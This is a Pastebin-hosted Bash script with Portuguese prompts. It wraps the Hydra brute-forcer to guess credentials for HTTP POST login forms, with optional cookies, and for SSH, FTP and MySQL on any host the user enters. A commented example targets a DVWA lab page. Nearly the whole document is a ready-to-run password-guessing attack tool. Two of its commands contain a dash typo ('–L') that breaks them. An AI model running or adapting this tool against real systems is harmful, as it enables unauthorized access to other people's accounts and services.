DarkProgrammer000

Hydra [expert]

Jul 8th, 2021
1,207
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/bin/bash
  2.  
  3. # Observacao (exemplo do Comando GET)
  4. # hydra -L user.txt -P pass.txt 192.168.0.19 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=security=low; acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=f5dt3o4blpdfanrgsgjnv15ls6" -t4 -V---------------------
  5.  
  6.  
  7. ---------------------
  8. * DarkProgrammer000 *
  9. ---------------------
  10.  
  11. # Funcao: Formulario POST
  12. Post()
  13. {
  14.     metodo="http-post-form"
  15.     echo -e "\033[01;31m -------------- EXEMPLO --------------- \033[00;37m"
  16.     echo -e "\033[01;32m Wordlist [usuarios]: user              \033[00;37m"
  17.     echo -e "\033[01;33m Wordlist [senhas]: pass                \033[00;37m"
  18.     echo -e "\033[01;34m Host: www.exemplo.com                  \033[00;37m"
  19.     echo -e "\033[01;35m Validacao: /dvwa/vulnerabilities/brute \033[00;37m"
  20.     echo -e "\033[01;36m Campo [nome]: username                 \033[00;37m"
  21.     echo -e "\033[01;37m Campo [senha]: password                \033[00;37m"
  22.     echo -e "\033[01;31m Saida de erro: 'senha invalida'        \033[00;37m"
  23.     echo -e "\033[01;32m Erro: 'senha invalida'                 \033[00;37m"
  24.     echo -e "\033[01;30m -------------------------------------- \033[00;37m"
  25.     echo ""
  26.     echo -e -n "\033[01;32m + Wordlist (usuarios): \033[00;37m"
  27.     read usuarios
  28.  
  29.     echo ""
  30.     echo -e -n "\033[01;33m + Wordlist (senhas): \033[00;37m"
  31.     read senhas
  32.  
  33.     echo ""
  34.     echo -e -n "\033[01;34m + Host (Ex: www.site.com): \033[00;37m"
  35.     read site
  36.  
  37.     echo ""
  38.     echo -e -n "\033[01;35m + Validacao (Ex: /admin/validar.php): \033[00;37m"
  39.     read validacao
  40.  
  41.     echo ""
  42.     echo -e -n "\033[01;31m + Campo login (Ex: usuario): \033[00;37m"
  43.     read user
  44.  
  45.     echo ""
  46.     echo -e -n "\033[01;32m + Campo senha (Ex: senha): \033[00;37m"
  47.     read pass
  48.  
  49.     echo ""
  50.     echo -e -n "\033[01;33m + Saida de erro (Ex: invalido): \033[00;37m"
  51.     read erro
  52.     echo ""
  53.  
  54.     echo ""
  55.     echo -e "\033[01;31m Informar Cookie: \033[00;37m"
  56.     echo -e "\033[01;32m [1] Sim \033[00;37m"
  57.     echo -e "\033[01;33m [2] Nao \033[00;37m"
  58.     echo ""
  59.     echo -e -n "\033[01;34m + Opc: \033[00;37m"
  60.     read resp
  61.  
  62.     # Estrutura em escolha    
  63.     case $resp in
  64.         1)
  65.             echo -e -n "\033[01;35m Cookie (Ex: Cookie: security=low; PHPSESSID=eh3utmffq3fuu0psbc1p24aah7): \033[00;37m"
  66.             read cookie
  67.        
  68.             # Hydra (com cookie)
  69.             hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro:H=$cookie" -V -t4
  70.             ;;    
  71.  
  72.         2)
  73.             # Hydra (sem cookie)
  74.             hydra -L $usuarios -P $senhas $site $metodo "$validacao:$user=^USER^&$pass=^PASS^:F=$erro" -V -t4
  75.             ;;
  76.  
  77.         *)
  78.             ;;
  79.     esac
  80. }
  81.  
  82. # Funcao: Servicos
  83. Services()
  84. {
  85.     echo -e "\033[01;31m -------------- EXEMPLO --------------- \033[00;37m"
  86.     echo -e "\033[01;32m Wordlist [usuarios]: user              \033[00;37m"
  87.         echo -e "\033[01;33m Wordlist [senhas]: pass                \033[00;37m"
  88.         echo -e "\033[01;34m Host: www.exemplo.com                  \033[00;37m"
  89.         echo -e "\033[01;30m -------------------------------------- \033[00;37m"
  90.     echo ""
  91.     echo -e -n "\033[01;34m + Host (Ex: www.site.com ou IP): \033[00;37m"
  92.     read ip
  93.  
  94.     clear
  95.     echo -e "\033[01;33m ---------------- \033[00;37m"
  96.     echo -e "\033[01;33m     Services     \033[00;37m"
  97.     echo -e "\033[01;33m ---------------- \033[00;37m"
  98.     echo ""
  99.     echo -e "\033[01;32m [1] SSH  \033[00;37m"
  100.     echo -e "\033[01;33m [2] FTP \033[00;37m"
  101.     echo -e "\033[01;34m [3] MYSQL \033[00;37m"
  102.     echo ""
  103.     echo -e -n "\033[01;35m + Opc: \033[00;37m"
  104.     read escolha
  105.     echo ""
  106.  
  107.     # Estrutura em escolha
  108.     case $escolha in
  109.  
  110.         1)
  111.             # Comando: ssh
  112.             hydra -L user -P pass $ip ssh -t4 -V;;
  113.         2)
  114.             # Comando: ftp
  115.             hydra –L user -P pass $ip ftp -t4 -V;;
  116.         3)
  117.             # Comando: mysql
  118.             hydra –L user -P pass $ip mysql -t4 -V;;
  119.        
  120.         *) ;;
  121.     esac
  122. }
  123.  
  124. ####################
  125. ##### PROGRAMA #####
  126. ####################
  127. clear
  128. echo -e "\033[01;33m ------------- \033[00;37m"
  129. echo -e "\033[01;33m     Hydra     \033[00;37m"
  130. echo -e "\033[01;33m ------------- \033[00;37m"
  131. echo ""
  132. echo -e "\033[01;32m [1] Formulario (POST) \033[00;37m"
  133. echo -e "\033[01;34m [2] Services \033[00;37m"
  134. echo ""
  135. echo -e -n "\033[01;35m + Opc: \033[00;37m"
  136. read escolha
  137. echo ""
  138.  
  139. # Estrutura em escolha
  140. case $escolha in
  141.    
  142.     1)  Post;;        
  143.     2)  Services ;;
  144.     *)  ;;
  145.  
  146. esac
RAW Paste Data